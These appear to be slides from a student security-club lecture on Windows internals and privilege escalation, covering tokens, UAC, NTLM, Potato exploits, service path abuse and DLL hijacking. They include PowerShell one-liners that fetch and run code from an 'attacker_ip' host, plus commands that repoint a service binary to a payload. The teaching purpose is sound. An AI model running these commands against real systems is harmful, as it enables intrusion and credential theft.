

FA2024 Week 06 • 2024-10-08

Windows & Windows Privilege Escalation

Ronan Boyarski

Table of Contents

- Basic Windows Overview
 - Privileges / Tokens
 - Process Integrity Levels
 - SYSTEM vs Administrator
 - NTDLL & Kernel32
 - CMD vs PowerShell vs linux equivalents
 - NTLM authentication overview
- Abuse
 - Trivial Privilege Escalation (Potato exploits)
 - Unquoted Service Paths & Weak Permissions
 - Pass-the-Hash (NTLM)
 - Net-NTLMv2 Hash Theft via SMB



Windows Overview



Privileges

- No sudo* like Linux
 - Each process has its own access token that determines more granular privileges
 - Token contains Security IDentifier (SID), Logon ID (LUID), group memberships & privileges
- Each process can have a bunch of granular privileges coming out of a huge list
- Some of these will trivially grant SYSTEM
 - I will cover this later with the Potato exploits
 - For example, one privilege will let you impersonate users, while another gives you arbitrary read on processes

Process Integrity

- Processes also have Integrity Levels
 - Low, Medium, High, SYSTEM
- To do anything really privileged, we will need a high integrity process
 - Default is medium
- This was done so that Administrator users are not running everything fully privileged by default
 - Equivalent of forcing folks to specify sudo instead of living as root
- Unfortunately, these are not considered a security boundary



Process Integrity

- Elevating from medium to high integrity is regulated by User Account Control
- But again, it's not a security boundary, meaning that there are a number of UAC bypass methods available, that, weirdly enough, are flagged by antivirus, and also considered a feature
- Many of these just need to be obfuscated, because they are working as intended
- Meaning, Administrator code execution always grants full privileges as long as you can use a UAC bypass



SYSTEM vs Administrator

- Things get even more borked here compared to linux
- Instead of a root user, Windows has SYSTEM
 - SYSTEM has all of the privileges over everything, but, by its nature, can't do some things (like using an HTTP proxy, or accessing stuff related to a desktop)
- Elevating from Administrator to SYSTEM is trivial (not a security boundary)
 - Usually as easy as starting a service
- If you've passed elementary school math, you should know by transitivity that this lets us go from medium-integrity admin to SYSTEM

SYSTEM vs Administrator

- SYSTEM rights let us do some things that Administrator can't do
 - Dumping LSASS
 - Dumping other credentials from memory
- Otherwise comparable to root access on linux



CMD & PowerShell

- These are syntactically not the same as Bash / Zsh / etc.
- They have their own syntax
- CMD is cursed and you should just google instead of learning it
- PowerShell is extremely powerful but also heavily monitored
- In a pentesting context, they are both invaluable, but in a red team context, they are both to be avoided
 - Can get PowerShell History with Get-History or (Get-PSReadlineOption). HistorySavePath



PowerShell History Lesson

- PowerShell is incredibly useful
 - Access to the entire .NET runtime
 - Execute arbitrary .NET assemblies fully in memory
 - Can be used as a high-level programming language
 - Entire C2 frameworks written in it at one point (EMPIRE)
- A while ago, this was **too good** for attackers and led to a number of changes
 - AMSI
 - Script Block Logging
 - Constrained Language Mode
 - Default Execution Policy
- Only Script Block Logging is a real obstacle for attackers



PowerShell

- With all things stealth, you will have to make a tradeoff.
 Sometimes running one suspicious PowerShell command in order to stay fileless is worth it.
- We can execute arbitrary remote scripts in one line

```
iwr -uri http://attacker_ip/run.ps1 iex
```

We can execute arbitrary remote .NET assemblies in one line

```
[System.Reflection.Assembly]::Load((New-Object
System.Net.WebClient).DownloadData('http://attacker_ip/ass
em.exe')).EntryPoint.Invoke($null, (, [string[]] ('foo')))
```

Default Services

- There is far too much to be covered here, but main ones are SMB & RPC
- SMB lets us upload and download files, as well as create and start services, if we have Administrator privileges on the target
 - The default ability to do this only exists in AD domains or on Windows Server, last I checked this does not work against personal computers
- However, if we have a valid local admin logon for SMB, we can use that to get SYSTEM trivially
- RPC will also allow some authenticated command execution but it's a bit of a black box for me at least

Windows Authentication

- Windows uses a number of methods for authentication, but, ignoring Active Directory, the most important is NTLM
 - Used for password hashing, thing /etc/shadow on Linux
- Windows will allow you to log in using a user's hash instead of their password
 - This leads to some absolutely comical abuse cases (google Hash Relaying, for example)
- This means that if we have only arbitrary read on LSASS, we can impersonate every user on the box
 - This will only happen if you have SYSTEM, but in networked cases, that's a big deal

Windows Authentication

- Not convoluted enough? Let's go over Net-NTLMv2
- Windows will automatically try to log in when accessing remote SMB shares
 - Specified through UNC paths like \\attacker\share
- If we make a request to \\attacker\share, we will try to log in, and the attacker will get your Net-NTLMv2 hash
 - This is **not** an NTLM hash (must be cracked, can't be passed)
- If we crack it, there are a number of ways of getting code execution on target, given some conditions
 - Local Admin compromised & target is either domain joined or running Windows Server

Windows Authentication Review

- So, at a high level, let's review some abuse primitives
- Getting SYSTEM lets you get the NTLM hash of every user
 - Because we can log in with hashes, if the same user exists on multiple boxes, we can potentially chain compromises
- We can send one link and get the Net-NTLMv2 hash of the user that clicked on it
 - We can then crack it and log back in using one of many lateral movement methods, but only in some circumstances
 - If you chain this with an SSRF against a server, you have an immediate win to SYSTEM
 - SSRF -> NetNTLMv2 of service account -> SMBEXEC -> SeImpersonatePrivilege -> SweetPotato -> SYSTEM



Windows Authentication Review

- We can also try to MITM instead of phishing
 - You can use a tool called Responder, which will leverage (among many other techniques) Link Local Multicast Name Resolution to say that your attacker share corresponds to certain hostnames
 - They then visit it and you get their Net-NTLMv2 hash



BUT WAIT - THERE'S MORE



Windows Authentication

- We don't even need to MITM or phish in some circumstances
- There are a number of authentication coercion "features" like the infamous Printer Bug, which, under certain circumstances, will force the target machine to authenticate to an attacker-controlled host
 - For the Printer Bug, the Print Spooler must be running on the target
- We can go even crazier by chaining this with hash relaying and logging into another computer using the authentication from the victim machine to log in somewhere else
 - We can force a machine to log us into another machine as them



Privilege Escalation



Trivial Privilege Escalation

- Check for these privileges whenever you get a shell (whoami /all), as they grant SYSTEM trivially
 - SelmpersonatePrivilege SweetPotato
 - SeAssignPrimaryPrivilege never exploited this personally
 - SeTcbPrivilege S4U w/Rubeus
 - SeBackupPrivilege Gives arbitrary read*
 - SeRestorePrivilege Gives arbitrary write*
 - SeCreateTokenPrivilege Can functionally impersonate
 - SeLoadDriverPrivilege Get kernel code execution
 - SeTakeOwnershipPrivilege That thing is mine now
 - SeDebugPrivilege Arbitrary read/write over processes



Service Privilege Escalation

- Mostly the same as linux in theory, just execution differences
- Enumerate services and check for weak privileges
- If the service path doesn't have quotes in it, then the search order for C:\Program Files\Test Service\Test Service.exe will be:
 - C:\Program.exe
 - C:\Program Files\Test.exe
 - C:\Program Files\Test Service\Test.exe
 - C:\Program Files\Test Service\Test Service.exe
- Meaning that if we can write anywhere in that chain we win



Service Privilege Escalation

- Alternatively, we may have the privilege to change the command line of the service
- Exploiting some of these is painful as it may require a reboot and you may not have the ability to start and stop services at will



Example Commands

- Enumerate Services
 - run wmic service get name, pathname
- Enumerate Permissions
 - powershell Get-Acl -Path "C:\Program
 Files\Vulnerable Services" | fl
- Using a C2
 - execute-assemblyC:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exeaudit UnquotedServicePath



Example Commands

- Exploit modifiable permissions
 - powershell-import C:\Tools\Get-ServiceAcl.ps1
 - powershell Get-ServiceAcl -Name VulnService | select-expand Access
 - sc config VulnService binPath=
 C:\Temp\tcp-local x64.svc.exe
 - sc stop VulnService
 - sc start VulnService
- Note that the space after binPath is intentional and necessary!



DLL Hijacking

- DLLs follow the same search order as service binaries
- If another process is looking for an unquoted path or a nonexistent DLL, we can place a malicious DLL there
 - We can use this for privilege escalation or persistence
- You can also search for DLL hijacks with EventViewer, or if you're feeling cheesy just run strings and look for nonexistent DLLs
- These are great when you get it right but generally a pain in the ass





UAC Bypasses

- There are a number of UAC bypasses out there
- These will take you from medium process integrity to high process integrity
 - This is for local admin accounts only
- There are plenty of bypasses out there, but what exactly to use is up to you
 - There are some BOFs that will tie directly into your C2
 - In other instances, you'll just have to use PowerShell etc.
- The only condition is that whatever software they target is installed, most should work fine
- OPSEC note: some of these will spawn GUI applications



Next Meetings

- 2024-10-10 This Thursday
- Hardening Default Windows Installations
- 2024-10-15 Next Tuesday
- Active Directory I
- 2024-10-17 Next Thursday
- Sysadmin for Active Directory

